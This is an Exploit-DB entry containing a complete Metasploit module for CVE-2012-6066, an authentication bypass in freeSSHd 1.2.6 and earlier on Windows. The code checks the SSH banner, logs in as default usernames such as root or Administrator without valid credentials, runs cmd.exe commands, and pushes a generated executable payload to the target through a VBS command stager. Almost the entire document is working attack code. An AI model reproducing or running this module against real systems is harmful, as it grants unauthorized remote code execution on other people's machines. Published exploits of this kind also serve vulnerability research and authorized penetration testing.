freeSSHd 1.2.6 - Authentication Bypass (Metasploit)

EDB-ID:

24133




Platform:

Windows

Date:

2013-01-15


require 'msf/core'
require 'tempfile'
class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::EXE

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Freesshd Authentication Bypass",
			'Description'    => %q{
					This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass
				authentication. You just need the username (which defaults to root). The exploit
				has been tested with both password and public key authentication.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Aris', # Vulnerability discovery and Exploit
					'kcope', # 2012 Exploit
					'Daniele Martini <cyrax[at]pkcrew.org>' # Metasploit module
				],
			'References'     =>
				[
					[ 'CVE', '2012-6066' ],
					[ 'OSVDB', '88006' ],
					[ 'BID', '56785' ],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html' ],
					[ 'URL', 'http://seclists.org/fulldisclosure/2010/Aug/132' ]
				],
			'Platform'       => 'win',
			'Privileged'     => true,
			'DisclosureDate' => "Aug 11 2010",
			'Targets' =>
				[
					[ 'Freesshd <= 1.2.6 / Windows (Universal)', {} ]
				],
			'DefaultTarget' => 0
		))

		register_options(
			[
				OptInt.new('RPORT', [false, 'The target port', 22]),
				OptString.new('USERNAMES',[true,'Space Separate list of usernames to try for ssh authentication','root admin Administrator'])
			], self.class)
	end

	def load_netssh
		begin
			require 'net/ssh'
			return true
		rescue LoadError
			return false
		end
	end

	def check
		connect
		banner = sock.recv(30)
		disconnect
		if banner =~ /SSH-2.0-WeOnlyDo/
			version=banner.split(" ")[1]
			return Exploit::CheckCode::Vulnerable if version =~ /(2.1.3|2.0.6)/
			return Exploit::CheckCode::Appears
		end
		return Exploit::CheckCode::Safe
	end


	def upload_payload(connection)
		exe = generate_payload_exe
		filename = rand_text_alpha(8) + ".exe"
		cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
		opts = {
			:linemax => 1700,
			:decoder => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64"),
		}

		cmds = cmdstager.generate(opts)

		if (cmds.nil? or cmds.length < 1)
			print_error("The command stager could not be generated")
			raise ArgumentError
		end
		cmds.each { |cmd|
			ret = connection.exec!("cmd.exe /c "+cmd)
		}

	end

	def setup_ssh_options
		pass=rand_text_alpha(8)
		options={
			:password => pass,
			:port     => datastore['RPORT'],
			:timeout  => 1,
			:proxies  => datastore['Proxies'],
			:key_data => OpenSSL::PKey::RSA.new(2048).to_pem
		}
		return options
	end

	def do_login(username,options)
		print_status("Trying username "+username)
		options[:username]=username

		transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options)
		auth = Net::SSH::Authentication::Session.new(transport, options)
		auth.authenticate("ssh-connection", username, options[:password])
		connection = Net::SSH::Connection::Session.new(transport, options)
		begin
			Timeout.timeout(10) do
				connection.exec!('cmd.exe /c echo')
			end
		rescue  RuntimeError
			return nil
		rescue	Timeout::Error
			print_status("Timeout")
			return nil
		end
		return connection
	end

	def exploit
		#
		# Load net/ssh so we can talk the SSH protocol
		#
		has_netssh = load_netssh
		if not has_netssh
			print_error("You don't have net/ssh installed.  Please run gem install net-ssh")
			return
		end

		options=setup_ssh_options

		connection = nil

		usernames=datastore['USERNAMES'].split(' ')
		usernames.each { |username|
			connection=do_login(username,options)
			break if connection
		}

		if connection
			print_status("Uploading payload. (This step can take up to 5 minutes. But if you are here, it will probably work. Have faith.)")
			upload_payload(connection)
			handler
		end
	end
end